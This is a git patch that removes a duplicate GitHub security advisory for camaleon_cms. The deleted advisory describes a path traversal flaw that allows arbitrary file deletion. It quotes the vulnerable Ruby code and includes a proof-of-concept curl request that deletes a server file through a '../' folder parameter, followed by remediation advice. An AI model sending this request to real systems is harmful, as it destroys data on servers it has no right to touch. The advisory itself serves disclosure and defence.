From b9d8c09acfb1c167b7fb59f8bae65341657251d1 Mon Sep 17 00:00:00 2001 From: Postmodern Date: Thu, 22 May 2025 11:35:40 -0700 Subject: [PATCH] Removed duplicate camaleon_cms advisory. * GHSA-3hp8-6j24-m5gm appears to be the exact same advisory as GHSA-7x4w-cj9r-h4v9, but with slightly different formatting. --- .../GHSA-3hp8-6j24-m5gm.json | 52 ------------------- 1 file changed, 52 deletions(-) delete mode 100644 advisories/github-reviewed/2024/09/GHSA-3hp8-6j24-m5gm/GHSA-3hp8-6j24-m5gm.json diff --git a/advisories/github-reviewed/2024/09/GHSA-3hp8-6j24-m5gm/GHSA-3hp8-6j24-m5gm.json b/advisories/github-reviewed/2024/09/GHSA-3hp8-6j24-m5gm/GHSA-3hp8-6j24-m5gm.json deleted file mode 100644 index 019d58422af24..0000000000000 --- a/advisories/github-reviewed/2024/09/GHSA-3hp8-6j24-m5gm/GHSA-3hp8-6j24-m5gm.json +++ /dev/null @@ -1,52 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3hp8-6j24-m5gm", - "modified": "2024-09-23T22:05:58Z", - "published": "2024-09-23T22:05:58Z", - "aliases": [], - "summary": "Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185)", - "details": "The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52) defined inside of the MediaController class do not check whether a given path is inside a certain path (e.g. inside the media folder). If an attacker performed an account takeover of an administrator account (See: GHSL-2024-184) they could delete arbitrary files or folders on the server hosting Camaleon CMS. The [crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65) action might make arbitrary file writes (similar impact to GHSL-2024-182) for any authenticated user possible, but it doesn't seem to work currently.\n\nArbitrary file deletion can be exploited with following code path:\nThe parameter folder flows from the actions method:\n```ruby\n def actions\n authorize! :manage, :media if params[:media_action] != 'crop_url'\n params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?\n case params[:media_action]\n [..]\n when 'del_file'\n cama_uploader.delete_file(params[:folder].gsub('//', '/'))\n render plain: ''\n```\ninto the method delete_file of the CamaleonCmsLocalUploader\nclass (when files are uploaded locally):\n```ruby\ndef delete_file(key)\n file = File.join(@root_folder, key)\n FileUtils.rm(file) if File.exist? file\n @instance.hooks_run('after_delete', key)\n get_media_collection.find_by_key(key).take.destroy\nend\n```\nWhere it is joined in an unchecked manner with the root folder and\nthen deleted.\n\n**Proof of concept**\nThe following request would delete the file README.md in the top folder of the Ruby on Rails application. (The values for auth_token, X-CSRF-Token and _cms_session would also need to be replaced with authenticated values in the curl command below)\n```\ncurl --path-as-is -i -s -k -X $'POST' \\\n -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \\\n -b $'auth_token=[..]; _cms_session=[..]' \\\n --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..\n2F..\n2F..\n2FREADME.md&media_action=del_file' \\\n $'https:///admin/media/actions?actions=true'\n```\n\n**Impact**\n\nThis issue may lead to a defective CMS or system.\n\n**Remediation**\n\nNormalize all file paths constructed from untrusted user input before using them and check that the resulting path is inside the\ntargeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.\n\n**See also:**\n\n[CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)\n[OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n", - "severity": [], - "affected": [ - { - "package": { - "ecosystem": "RubyGems", - "name": "camaleon_cms" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "2.8.1" - } - ] - } - ] - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9" - }, - { - "type": "PACKAGE", - "url": "https://github.com/owen2345/camaleon-cms" - }, - { - "type": "WEB", - "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-7x4w-cj9r-h4v9.yml" - } - ], - "database_specific": { - "cwe_ids": [], - "severity": "HIGH", - "github_reviewed": true, - "github_reviewed_at": "2024-09-23T22:05:58Z", - "nvd_published_at": null - } -} \ No newline at end of file